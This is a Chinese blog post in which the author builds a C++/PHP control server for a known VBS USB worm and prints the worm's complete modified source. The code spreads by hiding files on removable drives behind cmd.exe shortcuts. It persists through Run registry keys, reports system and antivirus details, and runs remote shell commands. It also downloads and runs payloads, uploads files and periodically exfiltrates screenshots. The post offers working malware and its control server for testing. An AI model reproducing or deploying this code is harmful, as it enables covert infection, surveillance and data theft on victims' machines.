uzgbtymhqo.vbs服务器端测试代码编写

最新推荐文章于 2019-09-01 15:14:03 发布
最新推荐文章于 2019-09-01 15:14:03 发布
阅读量1.5k 收藏
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014006264/article/details/46814779
版权
虽然是一个很小的vbs病毒,但是功能也是足够齐全的,会下载上传文件,删除文件,枚举进程,查看系统相关的信息,更新木马,查看磁盘目录及目录下的文件。
苦于没有服务器端,自己动手写了一个。
思路:用C++动态更新php文件内容,而php文件则作为客户端请求的响应脚本。如需执行命令只需在C++中输入即可。
运行界面:


服务器端目录如下:

主控php代码:(在is-recving/index.php下)

template.php主要目的是收集客户端的user-agent信息,而user-agent信息则被病毒修改为系统的信息,并保存在info.txt下。
最后info.txt内容是这样的:


template.php代码如下:

服务器端代码如下: 
#include "fstream"
#include "iostream"
#include 
   
   
    
    
#define MAXLENGTH 256
#define COMMANDS_COUNT 13
using namespace std;
int length(char* str)
{
	int i=0;
	while(str[i])
	{
		i++;
	}
	return i;
}
int _tmain(int argc, _TCHAR* argv[])
{
	string  dst="D:\\Documents\\Chapter1\\is-ready\\index.php";
	char* cmd=new char[MAXLENGTH];
	string example[COMMANDS_COUNT];
	for(int i=0;i
    
    
     
     shellobj.run \\\"calc\\\"\";";
	example[2]="echo \"exit-process<|>\\\"explorer.exe\\\"\";";
	example[3]="echo \"site-send<|>http://127.0.0.1:8080/download/test.jpg<|>xiao.jpg\";";
	example[4]="echo \"recv<|>E:\\Study\\Hack\\wooyun\\wooyun monthy -1.pdf\";";
	example[5]="echo \"enum-driver\";";
	example[6]="echo \"enum-faf<|>E:\\\\\";";
	example[7]="echo \"enum-process\";";
	example[8]="echo 'cmd-shell<|>net user Xiao  /delete';";
	example[9]="echo \"delete<|>E:\\Study\\Hack\\wooyun\\\\test.txt\";(这里两个斜杠是php下,\\\\t转义)";
	example[10]="echo \"sleep<|>5000\";";
	example[11]="echo uninstall;";
	cout<<"命令示例:"<
     
     
      
      10000",18);
			break;
		}
		fout.write("

最后,我在vbs上面加上了定时截图上传的功能。截图有python的PIL库来实现(实际中,机器都安装python了,应该也不会中这种弱智病毒的啦。。)
最后附上修改后的完整vbs病毒代码: 
'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "127.0.0.1"
port = 8080
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")

'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
'on error resume next
instance
'msgbox("response")
while true

install

response = ""
'execute<|>shellobj.run  ""
response = post ("is-ready","")
'msgbox(response)
cmd = split (response,spliter)
select case cmd (0)
case "execute"
      param = cmd (1)
	  'msgbox(param)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
'		msgbox(cmd(1)&"  "&cmd(2))
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select
shellobj.run "python.exe " & chr(34) & installdir & "screencap.py" & chr(34),vbhide
wscript.sleep 500

set fs=wscript.createobject("scripting.filesystemobject") 

if (fs.FileExists("tmp.jpg")) then 

set f=filesystemobj.getfile("tmp.jpg")
name=date&" "&time
name=replace(name,":","-")
name=replace(name,"/","-")
f.name=name&".jpg"
upload(name&".jpg")
filesystemobj.deletefile name&".jpg"

end if
wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd&"/index.php", false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
	inf = inf & date&"	"&time
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
	 osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date&"  "
   else
      usbspreading = "false - " & date&"  "
   end if
   shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
end If

generateScreenCaptureCode
upstart

set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
'msgbox(scriptfullnameshort.shortpath)
'msgbox(installfullnameshort.shortpath)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe  " & chr(34) & installdir & installname & Chr(34)  '成品用这个shellobj.run "wscript.exe  //B" & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
		.type = 1 
		.open
		.write objhttpdownload.responsebody
		.savetofile strsaveto
		.close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
	set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
		 .type = 1 
		 .open
		 .write objhttpdownload.responsebody
		 .savetofile strsaveto
		 .close
	end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
	 .loadfromfile fileurl
	 buffer = .read
	 .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving/index.php?&filename="&mid (fileurl, instrrev (fileurl,"\") + 1) , false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "	" & drive.drivetype & "	" & drive.freespace/(1024*1024*1024) & "GB" & spliter
end if
next
end Function
function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
	enumprocess = enumprocess & objitem.name & "|"
	enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function
sub generateScreenCaptureCode()
a=2
set objFSO=createobject("Scripting.FileSystemObject")
set objTextFile=objFSO.OpenTextFile(installdir&"screencap.py",a,true)
objTextFile.writeline("from PIL import ImageGrab")
'objTextFile.writeline("import time")
'objTextFile.writeline("now=time.strftime('%Y-%m-%d %H-%M-%S',time.localtime(time.time()))")
objTextFile.writeline("im=ImageGrab.grab()")
objTextFile.writeline("im.save('tmp.jpg','jpeg')")
objTextFile.close
end sub
要测试请先在服务器端安装PHP,客户端安装Python和PIL库。

HeHH0626
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Virus_lnk
ahoo110的博客
08-14 1815
本篇讲常见的lnk样本.
encrypt.vbs 内容加密vbs实现代码
09-05
《使用VBScript实现内容加密——encrypt.vbs代码详解》 在信息技术领域,数据安全是至关重要的,而数据加密则是保障信息安全的重要手段之一。VBScript(Visual Basic Script)是一种轻量级的脚本语言,常用于...
SampleOnlyForTest_uzgbtymhqo.vbs.zip
08-12
VBS样本快速分析
实验室缉毒记之uzgbtymhqo.vbs
u014006264的专栏
07-09 2485
去年的事情了,写下来记一下吧。 周三在机房插上U盘后,周四的数据库上机发现U盘里所有东西都变成lnk,如下图: 随便打开一个lnk内容如下: C:\windows\system32\cmd.exe /c start uzgbtymhqo.vbs&start explorer PowerDesigner15&exit 主要是这个uzgbtymhqo.vbs不知道是干什么的。
工作中样本处理流程
ahoo110的博客
08-12 374
样本处理流程
Script.VBS.Agent.ai juan.vbs专杀
09-06
Script.VBS.Agent.ai juan.vbs专杀
Autorun.vbs病毒专杀工具
04-02
1. **Autorun.vbs病毒**:这种病毒是基于Visual Basic Script (VBS) 编写的,会在插入计算机时自动运行,可能会篡改系统设置,复制自身到其他驱动器,甚至执行更复杂的恶意行为。 2. **自动运行(Autorun)机制**:...
使用 Adsutil.vbs iis管理脚本
09-04
通过熟练掌握 Adsutil.vbs,IIS 管理员可以高效地管理服务器配置,进行批量更新,或者在没有 GUI 环境的情况下执行日常维护任务。这个工具的灵活性和功能强大性使其成为 IIS 管理员的必备武器。
vbs压缩和解压zip,vbs压缩zip,vbs解压zip
07-06
vbs解压和压缩zip的,都有了,好用才放上来给大家下载,代码来自网上,整理一下,方便大家! 不是调用winrar的那种, 主要用到 Shell.Application对象
我是如何惩罚骗子的
u014006264的专栏
07-09 3600
这是去年的事了。 偶然在朋友圈看到一条信息,说是分享点赞截图就送手机的。很可能是骗子。我就跟进了一下,果然是个骗子。骗邮费。如图 拿这个邮箱去各种社工库都找不到任何相关的信息,也没查到注册信息。应该是一个专门骗钱的小号。 最后想到在支付宝的登陆页面填写忘记密码,可以给手机发短信。于是就学了python,写了几句代码,达到了目的,由于接口限制,15分钟内只能发送
vbs混淆脚本分析
Cosmopolitan的博客
09-01 4262
这里是混淆的代码 L = 0 : If (L = 0) Then : X = "Ͳ·Φͫνΰήκίΰνͫ΅ͫγκπίδιδͫͳήʹͫξζτλΰͫ΅ͫγκπίδιδ͸ασͫΨΉ͕͕͘͘ͲΈ͸Έ͸Έ͸Έ͸ΈͫήκιαδβͫΈ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͕͕͘͘γκξοͫΈͫͭρδΰςδ͹λπέηδήρθ͹ήκθ͕ͭ͘λκνοͫΈͫͿͿ͕͘διξοάηηίδνͫΈͫͭͰοΰθ...
pyqt调用update.vbs文件的代码
最新发布
03-31
由于update.vbs是一个Windows脚本文件,PyQt本身无法直接调用它。但你可以使用Python的os模块来启动一个新的进程并执行update.vbs文件。 下面是一个示例代码: ```python import os # 定义update.vbs文件路径 vbs_file = 'C:\\path\\to\\update.vbs' # 使用os模块启动一个新进程并执行vbs文件 os.system('start ' + vbs_file) ``` 请注意,此代码只在Windows操作系统上有效,因为update.vbs是一个Windows脚本文件。如果你想在其他操作系统上运行类似的代码,请考虑使用适合该操作系统的脚本语言。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值